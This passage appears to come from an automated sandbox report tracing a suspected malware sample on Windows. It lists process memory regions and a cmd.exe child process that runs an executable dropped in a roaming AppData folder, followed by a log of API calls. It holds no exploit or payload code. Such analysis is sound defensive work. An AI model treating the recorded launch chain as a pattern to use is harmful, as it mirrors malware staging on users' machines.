0x7ff71e80b000 end_va = 0x7ff71e80cfff entry_point = 0x0 region_type = private name = "private_0x00007ff71e80b000" filename = "" Region: id = 373 start_va = 0x7ff8ee0b0000 end_va = 0x7ff8ee14cfff entry_point = 0x7ff8ee0b0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 374 start_va = 0x807ce90000 end_va = 0x807ce96fff entry_point = 0x0 region_type = private name = "private_0x000000807ce90000" filename = "" Region: id = 375 start_va = 0x807cf40000 end_va = 0x807cf40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000807cf40000" filename = "" Region: id = 376 start_va = 0x807cf50000 end_va = 0x807cf56fff entry_point = 0x0 region_type = private name = "private_0x000000807cf50000" filename = "" Region: id = 377 start_va = 0x807d1e0000 end_va = 0x807d1effff entry_point = 0x0 region_type = private name = "private_0x000000807d1e0000" filename = "" Region: id = 378 start_va = 0x7ff8d5090000 end_va = 0x7ff8d50e2fff entry_point = 0x7ff8d5090000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 379 start_va = 0x7ff8e79b0000 end_va = 0x7ff8e7b32fff entry_point = 0x7ff8e79b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 380 start_va = 0x7ff8ebb30000 end_va = 0x7ff8ebbedfff entry_point = 0x7ff8ebb30000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 381 start_va = 0x7ff8ebdc0000 end_va = 0x7ff8ebf0dfff entry_point = 0x7ff8ebdc0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 382 start_va = 0x7ff8ec0c0000 end_va = 0x7ff8ec21bfff entry_point = 0x7ff8ec0c0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 383 start_va = 0x7ff8ec240000 end_va = 0x7ff8ec29afff entry_point = 0x7ff8ec240000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 384 start_va = 0x7ff8ec300000 end_va = 0x7ff8ec440fff entry_point = 0x7ff8ec300000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 385 start_va = 0x7ff8ec450000 end_va = 0x7ff8ec575fff entry_point = 0x7ff8ec450000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 386 start_va = 0x7ff8edbc0000 end_va = 0x7ff8edd44fff entry_point = 0x7ff8edbc0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 387 start_va = 0x7ff8edd60000 end_va = 0x7ff8edfdbfff entry_point = 0x7ff8edd60000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 388 start_va = 0x7ff8ee150000 end_va = 0x7ff8ee185fff entry_point = 0x7ff8ee150000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 389 start_va = 0x807d120000 end_va = 0x807d120fff entry_point = 0x0 region_type = private name = "private_0x000000807d120000" filename = "" Region: id = 390 start_va = 0x807d130000 end_va = 0x807d130fff entry_point = 0x0 region_type = private name = "private_0x000000807d130000" filename = "" Region: id = 391 start_va = 0x807d150000 end_va = 0x807d15ffff entry_point = 0x0 region_type = private name = "private_0x000000807d150000" filename = "" Region: id = 392 start_va = 0x807d160000 end_va = 0x807d19ffff entry_point = 0x0 region_type = private name = "private_0x000000807d160000" filename = "" Region: id = 393 start_va = 0x807d1f0000 end_va = 0x807d377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000807d1f0000" filename = "" Region: id = 394 start_va = 0x807d380000 end_va = 0x807d500fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000807d380000" filename = "" Region: id = 395 start_va = 0x807d510000 end_va = 0x807e90ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000807d510000" filename = "" Region: id = 396 start_va = 0x7ff71e809000 end_va = 0x7ff71e80afff entry_point = 0x0 region_type = private name = "private_0x00007ff71e809000" filename = "" Region: id = 397 start_va = 0x7ff8eadd0000 end_va = 0x7ff8eae19fff entry_point = 0x7ff8eadd0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 398 start_va = 0x7ff8eae20000 end_va = 0x7ff8eae2efff entry_point = 0x7ff8eae20000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 399 start_va = 0x7ff8eae30000 end_va = 0x7ff8eae42fff entry_point = 0x7ff8eae30000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 400 start_va = 0x7ff8eb180000 end_va = 0x7ff8eb7a7fff entry_point = 0x7ff8eb180000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 401 start_va = 0x7ff8eb7b0000 end_va = 0x7ff8eb862fff entry_point = 0x7ff8eb7b0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 402 start_va = 0x7ff8ec580000 end_va = 0x7ff8edaa4fff entry_point = 0x7ff8ec580000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 403 start_va = 0x7ff8edfe0000 end_va = 0x7ff8ee030fff entry_point = 0x7ff8edfe0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 404 start_va = 0x7ff8ee190000 end_va = 0x7ff8ee235fff entry_point = 0x7ff8ee190000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 405 start_va = 0x7ff8e9680000 end_va = 0x7ff8e9715fff entry_point = 0x7ff8e9680000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 406 start_va = 0x807cec0000 end_va = 0x807cec3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000807cec0000" filename = "" Region: id = 407 start_va = 0x807cef0000 end_va = 0x807cefffff entry_point = 0x0 region_type = private name = "private_0x000000807cef0000" filename = "" Region: id = 408 start_va = 0x807d1a0000 end_va = 0x807d1dffff entry_point = 0x0 region_type = private name = "private_0x000000807d1a0000" filename = "" Region: id = 409 start_va = 0x807e910000 end_va = 0x807ec46fff entry_point = 0x807e910000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 410 start_va = 0x807ec50000 end_va = 0x807ee6bfff entry_point = 0x0 region_type = private name = "private_0x000000807ec50000" filename = "" Region: id = 411 start_va = 0x807ee70000 end_va = 0x807f08bfff entry_point = 0x0 region_type = private name = "private_0x000000807ee70000" filename = "" Region: id = 412 start_va = 0x807f090000 end_va = 0x807f19afff entry_point = 0x0 region_type = private name = "private_0x000000807f090000" filename = "" Region: id = 413 start_va = 0x807f1a0000 end_va = 0x807f3bbfff entry_point = 0x0 region_type = private name = "private_0x000000807f1a0000" filename = "" Region: id = 414 start_va = 0x807f3c0000 end_va = 0x807f4cbfff entry_point = 0x0 region_type = private name = "private_0x000000807f3c0000" filename = "" Region: id = 415 start_va = 0x807f4d0000 end_va = 0x807f587fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000807f4d0000" filename = "" Region: id = 416 start_va = 0x7ff71e80d000 end_va = 0x7ff71e80efff entry_point = 0x0 region_type = private name = "private_0x00007ff71e80d000" filename = "" Region: id = 417 start_va = 0x7ff8e8fb0000 end_va = 0x7ff8e8fd1fff entry_point = 0x7ff8e8fb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 418 start_va = 0x7ff8e8ad0000 end_va = 0x7ff8e8ae2fff entry_point = 0x7ff8e8ad0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 419 start_va = 0x7ff8ea820000 end_va = 0x7ff8ea877fff entry_point = 0x7ff8ea820000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 420 start_va = 0x807ced0000 end_va = 0x807ced6fff entry_point = 0x0 region_type = private name = "private_0x000000807ced0000" filename = "" Region: id = 421 start_va = 0x807cee0000 end_va = 0x807cee4fff entry_point = 0x807cee0000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 422 start_va = 0x807d140000 end_va = 0x807d140fff entry_point = 0x807d140000 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 423 start_va = 0x807f590000 end_va = 0x807f591fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000807f590000" filename = "" Region: id = 424 start_va = 0x7ff8e57b0000 end_va = 0x7ff8e5a23fff entry_point = 0x7ff8e57b0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Thread: id = 12 os_tid = 0xf4c Thread: id = 13 os_tid = 0xf50 Thread: id = 14 os_tid = 0xf6c Thread: id = 15 os_tid = 0xf94 Process: id = "5" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x20ff4000" os_pid = "0xf9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xf40" cmd_line = "cmd /C \"\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00014ee5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 447 start_va = 0x280000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 448 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 449 start_va = 0x2b0000 end_va = 0x2c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 450 start_va = 0x2d0000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 451 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 452 start_va = 0x410000 end_va = 0x413fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 453 start_va = 0x420000 end_va = 0x420fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 454 start_va = 0x430000 end_va = 0x431fff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 455 start_va = 0x9e0000 end_va = 0xa2ffff entry_point = 0x9e0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 456 start_va = 0xa30000 end_va = 0x4a2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 457 start_va = 0x77ca0000 end_va = 0x77e18fff entry_point = 0x77ca0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 458 start_va = 0x7e970000 end_va = 0x7e992fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e970000" filename = "" Region: id = 459 start_va = 0x7e996000 end_va = 0x7e996fff entry_point = 0x0 region_type = private name = "private_0x000000007e996000" filename = "" Region: id = 460 start_va = 0x7e99c000 end_va = 0x7e99efff entry_point = 0x0 region_type = private name = "private_0x000000007e99c000" filename = "" Region: id = 461 start_va = 0x7e99f000 end_va = 0x7e99ffff entry_point = 0x0 region_type = private name = "private_0x000000007e99f000" filename = "" Region: id = 462 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 463 start_va = 0x7fff0000 end_va = 0x7df8ee37ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 464 start_va = 0x7df8ee380000 end_va = 0x7ff8ee37ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df8ee380000" filename = "" Region: id = 465 start_va = 0x7ff8ee380000 end_va = 0x7ff8ee541fff entry_point = 0x7ff8ee380000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 466 start_va = 0x7ff8ee542000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ff8ee542000" filename = "" Region: id = 467 start_va = 0x4d0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 468 start_va = 0x64af0000 end_va = 0x64b62fff entry_point = 0x64af0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 469 start_va = 0x64b70000 end_va = 0x64bbefff entry_point = 0x64b70000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 470 start_va = 0x64ae0000 end_va = 0x64ae7fff entry_point = 0x64ae0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 471 start_va = 0x280000 end_va = 0x28ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 472 start_va = 0x440000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 473 start_va = 0x4c0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 474 start_va = 0x520000 end_va = 0x61ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 475 start_va = 0x620000 end_va = 0x6ddfff entry_point = 0x620000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 476 start_va = 0x6e0000 end_va = 0x7dffff entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 477 start_va = 0x74e70000 end_va = 0x74fe5fff entry_point = 0x74e70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 478 start_va = 0x75260000 end_va = 0x7534ffff entry_point = 0x75260000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 479 start_va = 0x779f0000 end_va = 0x77aadfff entry_point = 0x779f0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 480 start_va = 0x7e870000 end_va = 0x7e96ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e870000" filename = "" Region: id = 481 start_va = 0x7e999000 end_va = 0x7e99bfff entry_point = 0x0 region_type = private name = "private_0x000000007e999000" filename = "" Region: id = 482 start_va = 0x290000 end_va = 0x293fff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 483 start_va = 0x2a0000 end_va = 0x2a3fff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 484 start_va = 0x4a30000 end_va = 0x4d66fff entry_point = 0x4a30000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 485 start_va = 0x74ca0000 end_va = 0x74d30fff entry_point = 0x74ca0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 486 start_va = 0x7e4e0000 end_va = 0x7e86ffff entry_point = 0x7e4e0000 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Thread: id = 17 os_tid = 0xfa0 [0065.675] GetModuleHandleA (lpModuleName=0x0) returned 0x9e0000 [0065.675] __set_app_type (_Type=0x1) [0065.675] __p__fmode () returned 0x77aa4d6c [0065.675] __p__commode () returned 0x77aa5b1c [0065.676] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x9f36e0) returned 0x0 [0065.676] __getmainargs (in: _Argc=0xa050e8, _Argv=0xa050ec, _Env=0xa050f0, _DoWildCard=0, _StartInfo=0xa050fc | out: _Argc=0xa050e8, _Argv=0xa050ec, _Env=0xa050f0) returned 0 [0065.676] GetCurrentThreadId () returned 0xfa0 [0065.676] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfa0) returned 0x84 [0065.676] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75260000 [0065.677] GetProcAddress (hModule=0x75260000, lpProcName="SetThreadUILanguage") returned 0x752a2780 [0065.677] SetThreadUILanguage (LangId=0x0) returned 0x409 [0065.680] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0065.680] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x40fe50 | out: phkResult=0x40fe50*=0x0) returned 0x2 [0065.681] VirtualQuery (in: lpAddress=0x40fe57, lpBuffer=0x40fe08, dwLength=0x1c | out: lpBuffer=0x40fe08*(BaseAddress=0x40f000, AllocationBase=0x310000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0065.681] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x40fe08, dwLength=0x1c | out: lpBuffer=0x40fe08*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0065.681] VirtualQuery (in: lpAddress=0x311000, lpBuffer=0x40fe08, dwLength=0x1c | out: lpBuffer=0x40fe08*(BaseAddress=0x311000, AllocationBase=0x310000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0065.681] VirtualQuery (in: lpAddress=0x313000, lpBuffer=0x40fe08, dwLength=0x1c | out: lpBuffer=0x40fe08*(BaseAddress=0x313000, AllocationBase=0x310000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0065.681] VirtualQuery (in: lpAddress=0x410000, lpBuffer=0x40fe08, dwLength=0x1c | out: lpBuffer=0x40fe08*(BaseAddress=0x410000, AllocationBase=0x410000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0065.681] GetConsoleOutputCP () returned 0x1b5 [0065.681] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xa0e460 | out: lpCPInfo=0xa0e460) returned 1 [0065.682] SetConsoleCtrlHandler (HandlerRoutine=0x9ff980, Add=1) returned 1 [0065.682] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.682] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0065.682] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.682] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0e40c | out: lpMode=0xa0e40c) returned 1 [0065.682] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.682] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0065.682] _get_osfhandle (_FileHandle=0) returned 0x38 [0065.683] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xa0e408 | out: lpMode=0xa0e408) returned 1 [0065.683] GetEnvironmentStringsW () returned 0x527ed0* [0065.683] FreeEnvironmentStringsA (penv="=") returned 1 [0065.683] GetEnvironmentStringsW () returned 0x527ed0* [0065.683] FreeEnvironmentStringsA (penv="=") returned 1 [0065.683] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x40edb4 | out: phkResult=0x40edb4*=0x94) returned 0x0 [0065.683] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x40edb8, lpData=0x40edc0, lpcbData=0x40edbc*=0x1000 | out: lpType=0x40edb8*=0x0, lpData=0x40edc0*=0xf8, lpcbData=0x40edbc*=0x1000) returned 0x2 [0065.683] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x40edb8, lpData=0x40edc0, lpcbData=0x40edbc*=0x1000 | out: lpType=0x40edb8*=0x4, lpData=0x40edc0*=0x1, lpcbData=0x40edbc*=0x4) returned 0x0 [0065.683] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x40edb8, lpData=0x40edc0, lpcbData=0x40edbc*=0x1000 | out: lpType=0x40edb8*=0x0, lpData=0x40edc0*=0x1, lpcbData=0x40edbc*=0x1000) returned 0x2 [0065.684] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x40edb8, lpData=0x40edc0, lpcbData=0x40edbc*=0x1000 | out: lpType=0x40edb8*=0x4, lpData=0x40edc0*=0x0, lpcbData=0x40edbc*=0x4) returned 0x0 [0065.684] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x40edb8, lpData=0x40edc0, lpcbData=0x40edbc*=0x1000 | out: lpType=0x40edb8*=0x4, lpData=0x40edc0*=0x40, lpcbData=0x40edbc*=0x4) returned 0x0 [0065.684] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x40edb8, lpData=0x40edc0, lpcbData=0x40edbc*=0x1000 | out: lpType=0x40edb8*=0x4, lpData=0x40edc0*=0x40, lpcbData=0x40edbc*=0x4) returned 0x0 [0065.684] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x40edb8, lpData=0x40edc0, lpcbData=0x40edbc*=0x1000 | out: lpType=0x40edb8*=0x0, lpData=0x40edc0*=0x40, lpcbData=0x40edbc*=0x1000) returned 0x2 [0065.684] RegCloseKey (hKey=0x94) returned 0x0 [0065.684] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x40edb4 | out: phkResult=0x40edb4*=0x94) returned 0x0 [0065.684] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x40edb8, lpData=0x40edc0, lpcbData=0x40edbc*=0x1000 | out: lpType=0x40edb8*=0x0, lpData=0x40edc0*=0x40, lpcbData=0x40edbc*=0x1000) returned 0x2 [0065.684] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x40edb8, lpData=0x40edc0, lpcbData=0x40edbc*=0x1000 | out: lpType=0x40edb8*=0x4, lpData=0x40edc0*=0x1, lpcbData=0x40edbc*=0x4) returned 0x0 [0065.684] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x40edb8, lpData=0x40edc0, lpcbData=0x40edbc*=0x1000 | out: lpType=0x40edb8*=0x0, lpData=0x40edc0*=0x1, lpcbData=0x40edbc*=0x1000) returned 0x2 [0065.684] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x40edb8, lpData=0x40edc0, lpcbData=0x40edbc*=0x1000 | out: lpType=0x40edb8*=0x4, lpData=0x40edc0*=0x0, lpcbData=0x40edbc*=0x4) returned 0x0 [0065.684] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x40edb8, lpData=0x40edc0, lpcbData=0x40edbc*=0x1000 | out: lpType=0x40edb8*=0x4, lpData=0x40edc0*=0x9, lpcbData=0x40edbc*=0x4) returned 0x0 [0065.684] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x40edb8, lpData=0x40edc0, lpcbData=0x40edbc*=0x1000 | out: lpType=0x40edb8*=0x4, lpData=0x40edc0*=0x9, lpcbData=0x40edbc*=0x4) returned 0x0 [0065.684] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x40edb8, lpData=0x40edc0, lpcbData=0x40edbc*=0x1000 | out: lpType=0x40edb8*=0x0, lpData=0x40edc0*=0x9, lpcbData=0x40edbc*=0x1000) returned 0x2 [0065.684] RegCloseKey (hKey=0x94) returned 0x0 [0065.684] time (in: timer=0x0 | out: timer=0x0) returned 0x5be179f0 [0065.684] srand (_Seed=0x5be179f0) [0065.684] GetCommandLineW () returned="cmd /C \"\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"\"" [0065.684] GetCommandLineW () returned="cmd /C \"\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"\"" [0065.684] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xa16720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0065.685] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x527ed8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0065.685] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xa0e4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0065.685] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xa0e4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0065.685] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xa0e4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0065.685] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xa0e4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0065.685] GetEnvironmentVariableW (in: lpName="KEYS", 